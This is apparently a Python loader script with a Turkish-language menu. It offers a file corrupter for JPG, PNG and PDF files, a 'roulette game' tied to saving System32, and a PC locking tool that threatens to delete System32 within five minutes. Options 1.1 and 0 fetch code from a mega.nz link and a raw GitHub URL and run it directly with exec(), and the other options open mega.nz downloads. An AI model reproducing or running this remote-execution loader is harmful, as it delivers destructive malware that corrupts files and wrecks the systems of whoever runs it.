mine = """\033[1;39m

                                                 ██████╗ ████████╗██╗  ██╗███████╗██████╗ 
                                                ██╔═══██╗╚══██╔══╝██║  ██║██╔════╝██╔══██╗
                                                ██║   ██║   ██║   ███████║█████╗  ██████╔╝
                                                ██║   ██║   ██║   ██╔══██║██╔══╝  ██╔══██╗
                                                ╚██████╔╝   ██║   ██║  ██║███████╗██║  ██║
                                                 ╚═════╝    ╚═╝   ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝                                                                                  
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
       \033[1;39m┌─────────────────────────────────────────── Archive ────────────────────────────────────────────┐            
       \033[1;32m║                           \033[1;39m  Version          : \033[1;30m 1.0.8                                          \033[1;32m║
       \033[1;32m║                           \033[1;39m  Discord          : \033[1;34m https://discord.gg/n24UMEyWgJ       \033[1;32m║
       \033[1;32m║                           \033[1;39m  Source           : \033[1;33m https://discord.gg/n24UMEyWgJ                           \033[1;32m║
       \033[1;32m║                           \033[1;39m  Loader Plan      : \033[1;32m Free                                           \033[1;32m║
       \033[1;39m└────────────────────────────────────────────────────────────────────────────────────────────────┘
   \033[0;31m                               Create a ticket if u found a client that not working.
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
                                                \033[1;39m┌────────────────────┐         
                                                \033[1;32m║    \033[1;39m    Python      \033[1;32m║          
                                                \033[1;39m└────────────────────┘          
\033[1;31m[\033[1;39m1.1\033[1;31m] \033[1;32mDosya Bozucu \033[1;31m[\033[1;33mSadece JPG-PNG-PDF Dosyalarinda Calisir\033[1;31m]  
\033[1;31m[\033[1;39m2.1\033[1;31m] \033[1;32mRulet Oyunu \033[1;31m[\033[1;33mSystem32 Kurtarmak Icin Dogru Rakami Bul\033[1;31m]
\033[1;31m[\033[1;39m3.1\033[1;31m] \033[1;32mPc Kilitleme Araci \033[1;31m[\033[1;33m5 Dk Icinde Sifreyi Bulmazsan System32 Silinir\033[1;31m]
"""
print(mine)
while True:
    os.system('cls')
    print(mine)
    chon = input('                                               \033[1;39m[\033[1;31m×\033[1;39m] \033[1;39m>> ')
    if chon == '1.1':
        exec(requests.get('https://mega.nz/file/grcWUAKZ#xipEo0wldKN6BuLOUKAkffAQlWghLrz9tqq9_jb2M0I').text)
    elif chon == '2.1':
        webbrowser.open_new("https://mega.nz/file/YidEnJBL#VFpG-ZSBHpaP7hBmin2Gw_aimcOjmW5Bl4t2kr7FtZY")
    elif chon == '3.1':
        webbrowser.open_new("https://mega.nz/file/F7cgTBqY#T841YKwcqAmOG94r0OXrw4TtvPpOkreY4GUwmFSWV7o")
    elif chon == '0':
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Main.txt').text)    
    else:
       continue
